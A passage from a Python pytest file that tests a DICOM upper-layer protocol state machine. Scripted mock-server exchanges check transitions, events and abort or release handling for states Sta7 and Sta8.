        scp.step()  # scp: recv the A-RELEASE-RQ
        self.wait_on_state(assoc.dul.state_machine, "Sta7")

    def test_evt01(self):
        """Test Sta7 + Evt1."""
        # Sta7 + Evt1 -> <ignore> -> Sta7
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        # Evt1 is logged but causes no state change from Sta7
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt1"]

    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta7 + Evt2."""
        # Sta7 + Evt2 -> <ignore> -> Sta7
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass

    def test_evt03(self):
        """Test Sta7 + Evt3."""
        # Sta7 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_associate_ac),  # unexpected AC while in Sta7
            ("recv", None),  # recv the A-ABORT from AA-8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt3", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt3"]
        # Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt04(self):
        """Test Sta7 + Evt4."""
        # Sta7 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_associate_rj),  # unexpected RJ while in Sta7
            ("recv", None),  # recv the A-ABORT from AA-8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt4", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt4"]
        # Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta7 + Evt5."""
        # Sta7 + Evt5 -> <ignore> -> Sta7
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass

    def test_evt06(self):
        """Test Sta7 + Evt6."""
        # Sta7 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_associate_rq),  # unexpected RQ while in Sta7
            ("recv", None),  # recv the A-ABORT from AA-8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt6", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt6"]
        # Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt07(self):
        """Test Sta7 + Evt7."""
        # Sta7 + Evt7 -> <ignore> -> Sta7
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt7"]

    def test_evt08(self):
        """Test Sta7 + Evt8."""
        # Sta7 + Evt8 -> <ignore> -> Sta7
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt8"]

    def test_evt09(self):
        """Test Sta7 + Evt9."""
        # Sta7 + Evt9 -> <ignore> -> Sta7
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt9"]

    def test_evt10(self):
        """Test Sta7 + Evt10."""
        # Sta7 + Evt10 -> AR-6 -> Sta7
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AR-6: Send P-DATA primitive
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", p_data_tf),  # data may still arrive during release
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        # primitive = self.assoc.dul.receive_pdu(wait=False)
        # assert isinstance(primitive, P_DATA)
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt10", "AR-6"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt10"]

    def test_evt11(self):
        """Test Sta7 + Evt11."""
        # Sta7 + Evt11 -> <ignore> -> Sta7
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt11"]

    def test_evt12(self):
        """Test Sta7 + Evt12."""
        # Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AR-8: Issue A-RELEASE (rq) - release collision
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),  # both sides requested release: collision
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt12"]

    def test_evt13(self):
        """Test Sta7 + Evt13."""
        # Sta7 + Evt13 -> AR-3 -> Sta1
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AR-3: Issue A-RELEASE (rp) primitive and close connection
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rp),  # the expected reply: normal release
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        primitive = self.assoc.dul.receive_pdu(wait=False)
        assert isinstance(primitive, A_RELEASE)
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt13", "AR-3"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt13"]

    def test_evt14(self):
        """Test Sta7 + Evt14."""
        # Sta7 + Evt14 -> <ignore> -> Sta7
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt14"]

    def test_evt15(self):
        """Test Sta7 + Evt15."""
        # Sta7 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU and start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("recv", None),  # recv the A-ABORT from AA-1
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt15", "AA-1"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt15"]

    def test_evt16(self):
        """Test Sta7 + Evt16."""
        # Sta7 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT and close connection
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_abort),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt16", "AA-3"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt16"]

    def test_evt17(self):
        """Test Sta7 + Evt17."""
        # Sta7 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),  # server exits -> connection closed under us
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.shutdown()
        time.sleep(0.5)  # allow the local DUL to notice the closed transport
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt17", "AA-4"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt17"]

    def test_evt18(self):
        """Test Sta7 + Evt18."""
        # Sta7 + Evt18 -> <ignore> -> Sta7
        # Evt18: ARTIM timer expired from <local service>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.artim_timer.timeout = 0.05
        self.assoc.dul.artim_timer.start()
        time.sleep(0.5)  # give the 0.05 s timer time to expire and be processed
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
        ]
        assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
        # Evt18 is logged but causes no state change
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt18"]

    def test_evt19(self):
        """Test Sta7 + Evt19."""
        # Sta7 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            # 0x08 is not a valid PDU type -> triggers Evt19 on the requestor
            ("send", b"\x08\x00\x00\x00\x00\x00"),
            ("recv", None),  # recv the A-ABORT from AA-8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt19", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt11", "Evt19"]
        # Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState08(TestStateBase):
    """Tests for State 08: Awaiting A-RELEASE (rp) primitive.

    The local DUL reaches Sta8 when the remote sends an A-RELEASE-RQ while
    no local release was requested (AR-2): the DUL issues an A-RELEASE
    indication and waits for the local user's A-RELEASE (rsp) primitive.
    """

    def move_to_state(self, assoc, scp):
        def is_release_requested():
            """Override ACSE.is_release_requested."""
            # Force False so the incoming A-RELEASE-RQ is not treated as a
            # reply to a local release request -> Sta6 + Evt12 -> AR-2 -> Sta8
            return False

        assoc.acse.is_release_requested = is_release_requested
        assoc.start()
        scp.step()  # scp: recv the A-ASSOCIATE-RQ
        scp.step()  # scp: send the A-ASSOCIATE-AC
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
        scp.step()  # scp: send the A-RELEASE-RQ
        self.wait_on_state(assoc.dul.state_machine, "Sta8")

    def test_evt01(self):
        """Test Sta8 + Evt1."""
        # Sta8 + Evt1 -> <ignore> -> Sta8
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt1"]

    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta8 + Evt2."""
        # Sta8 + Evt2 -> <ignore> -> Sta8
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass

    def test_evt03(self):
        """Test Sta8 + Evt3."""
        # Sta8 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", a_associate_ac),  # unexpected AC while in Sta8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt3", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt3"]

    def test_evt04(self):
        """Test Sta8 + Evt4."""
        # Sta8 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", a_associate_rj),  # unexpected RJ while in Sta8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt4", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt4"]

    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta8 + Evt5."""
        # Sta8 + Evt5 -> <ignore> -> Sta8
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass

    def test_evt06(self):
        """Test Sta8 + Evt6."""
        # Sta8 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", a_associate_rq),  # unexpected RQ while in Sta8
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt6", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt6"]

    def test_evt07(self):
        """Test Sta8 + Evt7."""
        # Sta8 + Evt7 -> <ignore> -> Sta8
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt7"]

    def test_evt08(self):
        """Test Sta8 + Evt8."""
        # Sta8 + Evt8 -> <ignore> -> Sta8
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt8"]

    def test_evt09(self):
        """Test Sta8 + Evt9."""
        # Sta8 + Evt9 -> AR-7 -> Sta8
        # Evt9: Receive P-DATA primitive from <local user>
        # AR-7: Send P-DATA-TF PDU to <remote>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt9"]

    def test_evt10(self):
        """Test Sta8 + Evt10."""
        # Sta8 + Evt10 -> AA-8 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", p_data_tf),  # remote may not send data after its release-rq
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt10", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt10"]

    def test_evt11(self):
        """Test Sta8 + Evt11."""
        # Sta8 + Evt11 -> <ignore> -> Sta8
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt11"]

    def test_evt12(self):
        """Test Sta8 + Evt12."""
        # Sta8 + Evt12 -> AA-8 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),  # get a_assoc_rq
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", a_release_rq),  # a second release-rq is a protocol error
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt12", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt12"]

    def test_evt13(self):
        """Test Sta8 + Evt13."""
        # Sta8 + Evt13 -> AA-8 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("send", a_release_rp),  # rp without a local rsp is a protocol error
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:5] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt13", "AA-8"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt13"]

    def test_evt14(self):
        """Test Sta8 + Evt14."""
        # Sta8 + Evt14 -> AR-4 -> Sta13
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        # AR-4: Send A-RELEASE-RP PDU and start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:4] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt12", "AR-2"),
        ]
        assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta8"]
        assert self.fsm._events[:5] == ["Evt1", "Evt2", "Evt3", "Evt12", "Evt14"]

    def test_evt15(self):
        """Test Sta8 + Evt15."""
